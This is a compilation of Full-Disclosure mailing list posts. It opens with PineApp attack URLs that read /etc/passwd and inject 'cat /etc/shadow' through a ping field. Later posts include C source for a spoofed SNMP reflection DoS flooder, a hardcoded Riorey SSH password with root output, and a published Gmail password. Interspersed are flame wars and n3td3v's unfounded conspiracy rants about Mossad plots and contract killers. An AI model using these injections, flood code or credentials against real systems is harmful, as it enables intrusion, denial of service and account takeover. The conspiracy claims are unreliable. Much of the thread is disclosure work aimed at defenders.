[Full-disclosure] pineapp mailsecure pwnage
https://192.168.0.1:7443/admin/viewmsg.php?msg=/etc/passwd pa_cli system ping ;/bin/sh pa_cli system ping ;chsh -s /bin/csh pineapp https://192.168.0.1:7443/admin/management.html?it=sys_usermng https://192.168.0.1:7443/admin/confnetworking.html?cmd=pingtype=upframepinghost=%27;cat%20/etc/shadow;%27pingtimes=3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SNMP Reflected Denial Of Service - PoC
Actually, if you test it against windows snmpd or a lot of Cable modems out there, the getbulk request causes a 1500 byte packet reply. You probably tested it against linux snmpd or cisco, which in that case , yes, it returns null. 31.08.2012, 09:31, Anestis Bechtsoudis bechtsoudi...@gmail.com: On 8/30/12 8:13 PM, Full Disclosure wrote: Hi list, I am releasing this code due to the fact that my dev server got hacked and people have been using it in the wild for bad things. Network admins should patch their networks appropriately by rejecting snmp connections from unwanted IPs. The quoted code is actually nothing more than a regular threaded UDP flood DoS tool, both SNMP spoofed requests and responses are equally 65 bytes (no reflection). Make a simple network capture for verification. The payload is a mis-used .1.3.6.1 getBulk SNMP request resulting in a null value response. A sample perl script with the biggest reflection factor per transaction achieved on Cisco devices is available here [1] (Amplification = 84 bytes request / 1480 bytes response). For more information about SNMP reflection DoS you may refer to this link [2]. The quoted code reminds me an old implementation on the same concept [3]. [1] http://pastebin.com/M9cJs89h [2] https://bechtsoudis.com/hacking/snmp-reflected-denial-of-service/ [3] http://packetstormsecurity.org/DoS/snmpdos.c -A -- #--# | Anestis Bechtsoudis | | | | Network Operation Center, | | Laboratory for Computing (LabCom), | | Dept. of Computer Engineering Informatics, | | University of Patras, Greece | |--| | Public Key: http://bit.ly/Q2f5gW | | Website: https://bechtsoudis.com | #--# ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SNMP Reflected Denial Of Service - PoC
) {
args.dstip = current-ip;
send_udp( args.socket, args.srcip, rand(), args.dstip,
SNMPPORT, payload, sizeof(payload)-1 );
current = current-next;
#ifdef DEBUG
count++;
printf(Packets sent: %lu\n, count);
#endif
}
}
}
void push_ip(struct snmp_s** snmp_s_ref, unsigned int ip) {
struct snmp_s* temp = malloc(sizeof(struct snmp_s));
temp-ip = ip;
temp-next = *snmp_s_ref;
*snmp_s_ref = temp;
}
void add_snmp_s(void) {
char* aline = calloc(16, sizeof(char) );
FILE* fp = fopen(args.filename, r );
if( fp == NULL) {
perror(Fatal error: );
}
while ( !feof(fp) )
{
fscanf( fp, %s\n, aline );
push_ip(first_s, inet_addr(aline));
memset( aline, 0, 16 );
}
fclose(fp);
#ifdef DEBUG
int l = snmp_s_length(first_s);
printf(Built linked list from file.\n);
printf(Nodes: %d\n, l);
#endif
}
int snmp_s_length(struct snmp_s* list) {
struct snmp_s *current = list;
int count = 0;
while( current != NULL ) {
count++;
current = current-next;
}
return count;
}
int main(int argc, char *argv[]) {
char *data;
int t=0;
int j=0;
// threads
pthread_t thread_id[MAXTHREADS];
data=malloc(sizeof(payload)+sizeof(payload)-1);
memcpy(data, payload, sizeof(payload)-1);
if(argc 3) {
printf(Usage: %s target ip reflectors list\n, argv[0]);
exit(1);
}
if((args.socket=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))0) /*open
sending socket*/
{
perror(socket);
exit(1);
}
/*Prepare IP header (static data)*/
ip_head.ihl = 5; /*headerlength with no options*/
ip_head.version = 4;
ip_head.tos = 22;
ip_head.frag_off = 0;
ip_head.ttl = 255;
ip_head.protocol = IPPROTO_UDP;
ip_head.check= 0;/*Must be zero for checksum calculation*/
/* Prepare UDP header*/
udp_head.len = htons(sizeof(struct udphdr)+sizeof(payload)-1);
args.srcip = inet_addr(argv[1]);
args.filename = argv[2];
// Read file and save the IPs in a linked list.
add_snmp_s();
// Create threads
for(t=0; tMAXTHREADS; t++) {
pthread_create(thread_id[t], NULL, drdos, NULL);
}
for(j=0; jMAXTHREADS; j++) {
pthread_join(thread_id[j], NULL);
}
return 0;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Intercepting TOR
All, Read an interesting article on intercepting TOR users via proxies and using the BeEF framework. today. http://packetstormsecurity.org/files/115516/jackin-tor.txt Any ideas on how this could be mitigated? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] can you answer this?
On 03/02/2012 08:20, RandallM wrote: since no one could answer the last one how bout this. In my FW log Trust (our 10.0.0.0. network) to untrust picked this up: 2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0 0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied My any to any denied queue. I've seen this sort of thing before, from misconfigured VPNs. Do you have someone using Tunngle on your network? It's a VPN product (as far as I understand it, primarily for gaming), and it appears to (mis)use the 7.xxx.xxx.xxx IP address space. See this for a report of similar packet sightings: http://www.tunngle.net/community/topic/18311-bsod/ My guess is that one of your users has set up this VPN in order to tunnel through your firewall, but it's not configured correctly and its DHCP requests are going onto your main network rather than (as intended) through the tunnel. You might want to look into who is using this... Granville Moore Nemesys Computer Consultants www.nemesys.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] i dont know security
Hello Full-Disclosure! I want to warn you that I dont know anything about running secure sites. As a result it seems I have been compromised! www.websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple D-Link Routers Vulnerable to Authentication Bypass
Multiple D-Link routers suffer from insecure implementations of the Home Network Administration Protocol which allow unauthenticated and/or unprivileged users to view and configure administrative settings on the router. Further, the mere existence of HNAP allows attackers to completely bypass the CAPTCHA login features that D-Link has made available in recent firmware releases. These vulnerabilities can be exploited by an individual inside the local network, as well as an external attacker. It is suspected that most, if not all, D-Link routers manufactured since 2006 have HNAP support and are vulnerable. However, only the following routers and firmware versions have been confirmed to date: 1) DI-524 hardware version C1, firmware version 3.23 2) DIR-628 hardware version B2, firmware versions 1.20NA and 1.22NA 3) DIR-655 hardware version A1, firmware version 1.30EA Full description and POC code available here: http://www.sourcesec.com/2010/01/09/d-link-routers-one-hack-to-own-them-all/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Cyber War Conspiracy
is connected to John Cartwright and there is a conspiracy to gag me because I was touching home too many truths about the build up towards cyber war and the people behind the plot for a cyber 9/11. It's not kids in their bedrooms with the anti-n3td3v aliases, its these guys in the suits conspiring to carry out a cyber 9/11. The aliases against me, they aren't kids. They are grown men security professionals, the same men who don't like being called out and can't even use their real names in their campaign against me. I openly post with my real name to criticize and still would be using my real name, accept it got banned by John Cartwright, the guy who hides behind grok.org.uk and nobody knows anything about, hiding in the shadows while banning anyone from this list who remotely gets close to the political truth. If you look back to January 2009 when n3td3v got banned it was exactly at the point where I wasn't believing in cyber war. I am the only person to be banned from this mailing list, you've got to ask yourself why. All I done was full disclosure which is what this list is about, but the people in power don't like it when its full disclosure of them not other people. Like the Mossad and Funsec, they don't like that mentioned on full disclosure. It's full disclosure of information, but because it involves something not liked because it exposes them, then its not accepted. You need to look into the real reasons n3td3v got banned and its nothing to do with what you think is the reason of someone with no value to the mailing list. Who dare say which disclosures are value and who's aren't. So already you're seeing evidence this mailing list is corrupt and the person running it panicking because his friends over at SANS and other places are being exposed for their crave for cyber war and a cyber 9/11 event to take place. Valdis isn't a random person either, hes proved hes pro-cyber war with a vested interest against me saying any of this stuff. Look at the people against me, then investigate their role in the ring of power thats developing in the cyber security vaccum. This is probably the last you'll see of the real n3td3v because there is sure to be a contract killer out to silence me. There have already been discreet warnings, like in the mp3 that was posted by vomithatsteve () yahoo com, it said mi6 were going to kill me, they actually ment U.S Intelligence, but put MI6 in its place just to screw with British Intelligence even more. And the warning by - o z - osgo () hotmail com and reposted by sahalderf at ymail.com that said Solutions: There's a few, but I wouldn't want to be responsible for the end result If I was just some kid troll, would any of this have gone on for so long? How many years is it now? There will be no let down, there has been no trolling apart from the times the sponsored aliases have frustrated me into a flame to distract me from posting what I wanted to post that was hitting the political truth too much. There is more going on than you can see, this is a war at the moment of words because there are vested interest groups out there wanting cyber war to advance the security industry, while there are people like me who are monitoring these guys and seeing their intentions and they don't like anyone who is exposing them and me wanting to stop them from carrying out cyber-war/terrorism to advance the security industry. Expect more people impersonating me, signing as my real life name etc... mock psycho analysis emails being post by people who are too cowardly to use their real name, they aren't kids, they are the political elite trying to make sure anything I say is trashed. I am saving the world from the people who claim to be saving the world, but how can they be saving the world if they are planning a cyber event to push forward the advancement of the cyber security industry? Cue all the sponsored aliases who are out to get me, by the time you read this email address will already be banned. Just listen to the State of the Internet 2009 panel podcast by SANS, they got an audience to laugh out loud when they kept mentioning my n3td3v name, the recording is available on the internet as a podcast, this isn't just people annoyed about some kid on full-disclosure mailing list, this is part of a sophisticated campaign against me which started in 2006. This is unprecedented the amount of effort gone into trashing some apparent kid called n3td3v, if I was just some kid they wouldn't be going to the lengths they have to trash me. This mailing list is part of corruption, the corruption that is covering up n3td3v and sweeping him under the carpet and throwing him away. My last words to you is, don't let this matter rest, they have got rid of n3td3v, but there are bound to be people who will investigate what im saying, and I hope they do. Because my last request before I finish this rant is, don't forget the things ive been talking
Re: [Full-disclosure] funsec as a terror cell
What has Al-Qaeda got to do with The Mossad planting fake car bombs in Tel Aviv? According to Reuters it was nothing to do with Al-Qaeda and was a test-run to target Arab guerrilla leaders. The Mossad chose Tel Aviv port for a “model run” — Israeli spooks’ term for a rehearsed operation in a safe area that closely resembles the real target’s environment. So: What foreign ports look most like Tel Aviv’s, and which Arab guerrilla leaders frequent them? http://blogs.reuters.com/axismundi/2009/11/25/frayed-cloak-rusty-dagger/ Original Message From: RandallM randa...@fidmail.com Apparently from: full-disclosure-boun...@lists.grok.org.uk To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] funsec as a terror cell Date: Sat, 28 Nov 2009 09:50:12 -0600 /me wonders how close a relationship I have with al Qaeda. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Impersonation attempt of MI7
Under U.K and U.S law its illegal to impersonate an intelligence agency (MI7) and / or intelligence officer. Looks like jdl at mac.hush.com has got himself into a bit of a mess while trying to mock-n3td3v. I don't think the authorities care about you mocking n3td3v but when you signed your mock emails with his actual real life name and put MI7 along with it you have entered into a grey area. Formally you could be charged under U.K law with your emails, I doubt anyone is going to pursue the matter though but its worth noting you have actually broken the law. It's likely you didn't realise MI7 was an actual intelligence agency but thats the risk you took in your mock-n3td3v emails. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symantec Online Store Hacked
Why don't you go off to The Mossad's Funsec and post this stuff? It was only a fake car bomb... Original Message From: Ivan . ivan...@gmail.com Apparently from: full-disclosure-boun...@lists.grok.org.uk To: full-disclosure full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Symantec Online Store Hacked Date: Mon, 30 Nov 2009 09:13:32 +1100 http://news.softpedia.com/news/Symantec-Online-Store-Hacked-127726.shtml ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] funsec as a terror cell
How does that have any relationship to funsec? I don't trust anyone connected to Gadi Evron, Mossad, IDF, especially if they are going around planting car bombs, then what do you expect they have planned in the cyber domain to obtain more power over the people? I certainly wouldn't subscribe to Funsec. Sure harvest the data post to build up evidence against them but apart from that I wouldn't want to be part of it. While Funsec doesn't appear sinister its still a branch of the bigger picture of Gadi Evron, Mossad, IDF and their Clandestine operations. Most of the folks on Funsec are just there to groom Gadi Evron because of his connections with Israeli Intelligence, they aren't genuinely supportive of Gadi Evron. However, there do seem to be a few fruitcakes on there such as yourself who are genuinely supportive of Gadi Evron, Mossad, IDF and don't seem to be able to scope the bigger picture of whats going on. It is them I feel sorry for, the ones who don't realise, the naive ones of the Funsec mailing list who probably don't realise the bigger picture. Proof people aren't genuinely supportive of Gadi Evron and we are all working against him/them on the mailing list: Forwarded conversation Subject: fyi From: n3td3v xploita...@gmail.com Date: Thu, Oct 16, 2008 at 6:19 PM To: la...@larryseltzer.com funsec is a branch of the mossad -- From: Larry Seltzer la...@larryseltzer.com Date: Thu, Oct 16, 2008 at 6:27 PM To: n3td3v xploita...@gmail.com Why do you think I posted the story there? -- From: n3td3v xploita...@gmail.com Date: Thu, Oct 16, 2008 at 6:33 PM To: Larry Seltzer la...@larryseltzer.com lol ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] funsec as a terror cell
we've been outed by an MI7 mole. i honestly don't think you actually believe jdl at mac.hush.com was anything but an impersonation attempt. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Impersonation is a against the law.
it was funny you pretending to be n3td3v LOL... Original Message From: kaibelf j...@mac.hush.com Apparently from: full-disclosure-boun...@lists.grok.org.uk To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Impersonation is a against the law. Date: Thu, 19 Nov 2009 00:20:54 + if u r from the British Government I amlooking for jobs in national security ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GCHQ supplier pans government file-sharing plans
One of the companies that supply intelligence technology to the government has criticised UK plans to monitor file-sharers. Detica told ZDNet UK on Thursday that government plans to force ISPs to identify unlawful file-sharers were not proportionate. If the government chose to go down that route, we would come out strongly against, said Detica media accounts director Dan Klein. It's not necessary or proportionate. Detica, a BAE subsidiary, provides technologies that are used by the intelligence services and law enforcement to gather intelligence. While targeted monitoring of potential terrorists was proportionate, said Klein, using similar technologies for civil infringements was unnecessary. http://news.zdnet.co.uk/security/0,100189,39906065,00.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] funsec as a terror cell
What do you folks think about funsec developing into a terror cell of security professionals? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] funsec as a terror cell
A trainee spy for Israel's secret service agency Mossad was arrested by Tel Aviv police while taking part in a training operation, media reports say. The young trainee was spotted by a female passer-by as he planted a fake bomb under a vehicle in the city. http://news.bbc.co.uk/1/hi/world/middle_east/8377746.stm [/cut] Are these the people Valdis.Kletnieks wants to be associated with? Original Message From: valdis.kletni...@vt.edu To: full-disclos...@safe-mail.net Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] funsec as a terror cell Date: Fri, 27 Nov 2009 16:01:29 -0500 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Riorey RIOS Hardcoded Password Vulnerability
Title: Riorey RIOS Hardcoded Password Vulnerability Severity: High (Full root access to the device) Date: 07 October 2009 Versions Affected: RIOS 4.6.6 , 4.7.0 possibly others Discovered on: 25 July 2009 Vendor URL: www.riorey.com Author: Marek Kroemeke Overview: Riorey DDoS mitigation appliences (www.riorey.com) are vulnerable to taking a full control over affected devices via a hardcoded username and password used to create a SSH tunnel between the RView application and the device itself. Details: Riorey devices running affected RIOS versions have a hardcoded username and password that is then used by the RView software to connect on port 8022 in order to create a SSH tunnel. This allows the attacker to login as user 'dbuser' using the hardcoded password, and due to an old Linux kernel version used - escalate privilages through several vulnerabilities and eventually take the full control over the device. Additionally - the web interface advices the user to reset the admin password for security reasons, but the RView application still uses the hardcoded password in order to create the SSH tunnel which may result in a false sense of security. Proof of Concept: Open your favorite SSH client and use the following detials in order to login: port: 8022 username: dbadmin password: sq!us3r -- cut -- r...@rioreyxxx dbuser # id uid=0(root) gid=0(root) groups=0(root) r...@rioreyxxx dbuser # uname -a Linux rioreyXXX 2.6.16.6 #23 SMP Fri Oct 24 19:29:08 EDT 2008 x86_64 Dual-Core AMD Opteron(tm) Processor 1210 HE AuthenticAMD GNU/Linux -- cut -- Mitigation: Login to the device via SSH using the above details, and reset the password using the 'passwd' command. Vendor Contact: 30 July 2009 - Initial vendor contact 31 July 2009 - Vendor replies advising to use a firewall in front of the device 01 August 2009 - Vendor replies that next software release will address this problem, work in progress 09 August 2009 - Vendor sends an email confirming that it's not ready yet but will be by the end of the month 16 August 2009 - Confirmation about realease day of a patched version - 05 October 2009 07 October 2009 - Releasing the vulnerability report. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Full Disclosure Gmail account
bob jones has invited you to open a free Gmail account. Thanks bob! account name: full.disclosure.pub...@gmail.com password: structuredexceptionhandler ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e-Holocaust
Okay e.hitler you mention you're attacking Israeli servers*, lets ignore the impact of that for a second. e.Hitler I want you to tell me, in more than a sentence, why you did that. Yeh, you failed to mention it in your original post. Tell me exactly how your cause makes you feel, and why. Now tell me how what you're doing makes a difference, that is: 'In what way does what you did help solve the problem that was bothering you?' (read it!: HOW does it make a difference, don't just tell me THAT it makes a difference, I want you to describe out a sequence of events. One more question. Do you think you're a good hacker (in terms of skill). I'm not saying you're good or bad, I've no idea. Further more I couldn't tell you what makes a good hacker, I don't know enough (any) of them. Do you think that this event here proves that, or at least aids proving it? *Btw defacements happen all the time - wanna do some research on pathetic skiddies? search the 'google dorks' included in web app exploits when they're published on milw0rm. They're actually competing for the servers (re-owning them, etc). Those 21 sites are a drop in the ocean compared to how many (even ant-Israeli, and the other side) defacements have happened. As for the paypal accounts and (so called) 'ownage' of individuals and their personal data, really this is another drop in the ocean for Israel (what its economy). Compare the well-being of these individuals with the number of people being killed in a WAR! Hell! Compare it to the holocaust, now argue with a WWII vet or holocaust survivor (are there any still living?) that you are e.Hitler, righteous internet warrior. Not only that, most CC companies give you the money you lost scams or stolen paypals. You can even cancel it before transactions are payed. Then there's insurance companies. Cheers. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CCIE makes u go nuts?? or is that only nuts get CCIE????
I don't get why this is news. Murder happens all the time. Has he even been found guilty yet? True it looks like it is, but just look at that news article! You can perve on some poor guys destruction because it makes great news. I remember this happened a few years back to someone else and the guy was found innocent, despite the way the news channels made it look. On 1/3/09, Joel Jose joeljose...@gmail.com wrote: http://www.networkworld.com/community/node/35713 It scares the hell out of me. when i read the topics...and try to learn i cant help my mind and heart doubting...when will my name come in a news like that.. maaa... 8 years in cisco... a voice architect. hm... i was wanting to become like that without the twists that is... ;(... its scary lemme see ur responses Joel. -- it's not the years in your life that count. It's the life in your years. Abraham Lincoln ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- I'm your best best friend. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
Oh my, you both seem to have emailed your conversation to the full disclosure mailing list by accident. How embarrassing. Every body who is subscribed has received emails of you two talking about something that ONLY CONCERNS YOU TWO. Maybe next time when you send emails to each other you should double check that you're not sending them to a mailing list about vulnerability disclosure. On 12/22/08, n3td3v xploita...@gmail.com wrote: On Mon, Dec 22, 2008 at 1:26 PM, Ureleet urel...@gmail.com wrote: u say u r a badass hacker When? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- I'm your best best friend. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft issues out-of-band patch
Here's an article explaining why Microsoft delays their patching: http://en.wikipedia.org/wiki/Patch_Tuesday Specifically this bit: In order to reduce the costs related to the deployment of patches, Microsoft introduced the concept of Patch Tuesday. The idea is that security patches are accumulated over a period of one month, and then dispatched all at once on an anticipated date which system administrators can prepare for. On 12/19/08, Bipin Gautam bipin.gau...@gmail.com wrote: stop putting so much of attention to 0-day and possible use of it by government to get into a terrorist pc. if breaking into someones pc was a matter of national security importance 0-day may provide a easy leverage but you really dont need a 0-day to get into someones pc, neither you'd need a already existing/known backdoor, neither you'd need to bruteforce into the advisory or a physical access to it. all they need to do is poison a unsigned executable/plugin/update with a backdoor instead, that is being downloaded to the advisory computer over an unencrypted connection if you can control the network gateway or have isp level access. such attacks could work regardless of the OS or patch level. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- I'm your best best friend. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 21 Million German bank accounts stolen
To you or someone who knows anything about banks, fraud, and how they work and things. I have a German bank account. Should I do something!? On 12/9/08, James Matthews [EMAIL PROTECTED] wrote: German banks are some of the oldest in the world. This is pretty scary however it is also the reality of germanys new laws... I hope they find it soon and protect the people that need to be protected http://it.slashdot.org/it/08/12/09/0125201.shtml -- http://www.astorandblack.com/ -- I'm your best best friend. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We're letting the bad guys win
ok this is what this whole thing looks like to me: To n3td3v: You often post ideas and express your opinion to this list. The some (often the more liberal) of us often disagree with you and others mock you for your adventurousness. Actually sometimes it looks childish, almost as if you're desperately trying to propose the big new thing that changes the world. The thing is your posting to a list where really, all that happens is people (mostly sec companies) post information on vulnerabilities in software and news in the sec field. You say you came here for information, then LEACH like the rest of us - just shut up. If you want a mailing list for proposed security project ideas then make one. You're enthusiastic and a dreamer who's obviously very forward and ambitious with that excellence. Just think before you talk, and maybe do something, like sit down and think: I want to be $A(as in what you're going to do with your LIFE!). To be that I need to get $B done. To do that I have to do $C[]/*-that's a list(:s)*/. To all that oppose n3td3v: Some of you (UreLeet + others) get a little too excited and flame. If you don't like how someone acts, what they have to say, who they are: then shut up! You don't need to bully something into submission just because you don't like it. If you get some angry rush feeling when you see a some stupid fat kid majorly embarrass himself by attempting to be funny with his freinds and just looking like that annoying retard kid the don't bully him! Be gentle and point out the problem (privately) (of course first think are you really of a knowledge and responsibility to instruct this child how to change his life) OR, much better: shut up, and go take your (own) anger out somewhere else, PC games do it for me, www.thepcmanwebsite.com/media/pacman_flash/ - even that's good enough. btw n3td3v - I don't think you're a retarded fat child (ur not right?). Come to think about it: We're being listened to by a bunch of other people, mostly geeks who think FD is the shitz where all the l33t sec companies go for their patches and sec news (it isn't!). But are we all just doing this crap for the benefit of out audience. I mean I could have written these things to the individuals they where intended for. Hell I could have taken my own advice and shut up, blocked the troublesome email addresses, and carried on with my life (I'm a hobbiest). Are You All Just Doing This For The Benefit Of The Sec Gods We Wish We Where? THINK ABOUT IT Oh also I don't care about me - I'm a leach, I'll should probably not post on this list unless I have something decent to say too. On 12/9/08, Ureleet [EMAIL PROTECTED] wrote: thats all he does is deflect, weve established that he never gives a real answer. On Tue, Dec 9, 2008 at 12:25 PM, Elazar Broad [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Brilliant use of deflection, keep it up, you might end up as some loser serial rapist on Law and Order, oh wait, they want actor's, not the real thing... On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v [EMAIL PROTECTED] wrote: On Tue, Dec 9, 2008 at 3:08 PM, Paul Schmehl [EMAIL PROTECTED] wrote: --On Tuesday, December 09, 2008 00:25:18 -0600 [EMAIL PROTECTED] wrote: On Tue, 09 Dec 2008 04:03:57 GMT, n3td3v said: We need to stop this back and forth fighting its making infosec look bad, this isn't what infosec should be about. It's making one very small insignificant corner of infosec look bad. Let's keep a sense of perspective, guys. Or, to look at it another way, it's tying up all the idiots in one place and keeping the rest of infosec unsullied. :-) I agree, But full-disclosure shouldn't be full of idiots so why do we let it be that way. It's because we reply to them that it happens. I was gullible and naive to reply to them, i'm not replying to them anymore. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkk+qhEACgkQi04xwClgpZg3kQP9GEBAH9byz3/fJKvWHN9IFX0ycf17 0LS0fUg/5BRHXck+a2uEZsNujlKoMYyl1XshW+HWH0rwmDTw/1S88vCqULiqiMI7yXD0 G01L1MDkA+dM9ntF0IHSPUz3r2a4qVfP4D8o6KB45oDizZOLiCB5zGQdV5g1hwlHEBsL KMecN/o= =dDzW -END PGP SIGNATURE- -- Click for free info on getting an MBA, $200K/ year potential. http://tagline.hushmail.com/fc/PnY6qxsZwUO4JCrKLyAXmX1gJtIyy84Kr2W2NrYeIgv5LuxCIhDBW/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted
Re: [Full-disclosure] FD culture!?
'British intelligence service'!? According to this: http://lists.grok.org.uk/full-disclosure-charter.html ...Full Disclosure is run by secunia. And administered by one man. Does the 'British Intelligence Service' doesn't even exist? There's: The Security Service AKA MI5. and SIS AKA the Secret Intelligence Service. Also any one who thinks FD is/should be something read the info in the link above. On 12/6/08, n3td3v [EMAIL PROTECTED] wrote: What part of there are no moderators don't you get. This list is run by the British intelligence service and you are a guest here. On Sat, Dec 6, 2008 at 6:00 AM, Bipin Gautam [EMAIL PROTECTED] wrote: Shame on FD moderators ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- I'm your best best friend. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Project Chroma: A color code for the state of cyber security
I'd just like to point out that Symantec has something similar. See here: http://www.symantec.com/security_response/threatconlearn.jsp It's not applied in such a useful way as you suggest - but in case you wanted to know. On 11/29/08, Mike C [EMAIL PROTECTED] wrote: Hi, It is time to take an example from Homeland Security and define codes of color for cyber-warfare threat levels. I propose the following: Green level: There is negligible threat to online security. Yellow level : There is a minimal level of threat, and this must be monitored and contained. Orange level: This level of threat indicates there are parties who are actively engaging in cyber-warfare. Caution is required when online. Red level: This level indicates a full blown cyber-war. It indicates very high probability of all communications being intercepted. While homeland security's implementation does not seem to have a real world merit, such a threat level would certainly be very useful in the online security realm. Please disseminate this announcement of the project Chroma levels for online security. The immediate mission of the project is to be picked up by the antivirus and security tools vendors, so as to add the color codes to their products and provide users with a tangible measure of their online security. Current status: Threat level Yellow. -- MC Security Researcher Lead, Project Chroma. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- I'm your best best friend. Usually I like it when you contradict me, it might help me learn. Just don't be so angry. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Indian allegations alarm Pakistan
Aren't they just a bunch of kids trying to brag on IRC that they hacked their 'enemy' country? Maybe they don't like them because of propaganda is telling them Indians did the bombing. Or maybe they, like most kids, they've no idea about current affairs and just want to prove themselves good in their own little world. Like what happned with Russia vs. Georgia. On 11/30/08, James Matthews [EMAIL PROTECTED] wrote: India was attacked the attackers came from Pakistan, I understand why Pakistan feels threatened however why would they attack Indian sites? On Sun, Nov 30, 2008 at 9:19 AM, Mike C [EMAIL PROTECTED] wrote: On Sun, Nov 30, 2008 at 11:11 AM, n3td3v [EMAIL PROTECTED] wrote: On Sun, Nov 30, 2008 at 5:25 AM, Mike C [EMAIL PROTECTED] wrote: On Sun, Nov 30, 2008 at 7:39 AM, Raj Mathur [EMAIL PROTECTED] wrote: On Sunday 30 Nov 2008, n3td3v wrote: Indian-Pakistan war is about to kick off folks... http://news.bbc.co.uk/1/hi/world/south_asia/7757031.stm I know it's not going to happen, but can I request you once again shut the fuck up about events that you have no clue about? At least try to keep your sensationalist retarded drivel to your own backyard. Although a knee-jerk reaction, this post has some value. The tensions between the countries is on the rise, and the recent blasts in Bangalore would increase the chances of war. BTW, does anyone have an idea on what kind of cyber-warfare is currently underway between the two nations? -- MC There was a report earlier in the week via pcworld.com, but I don't 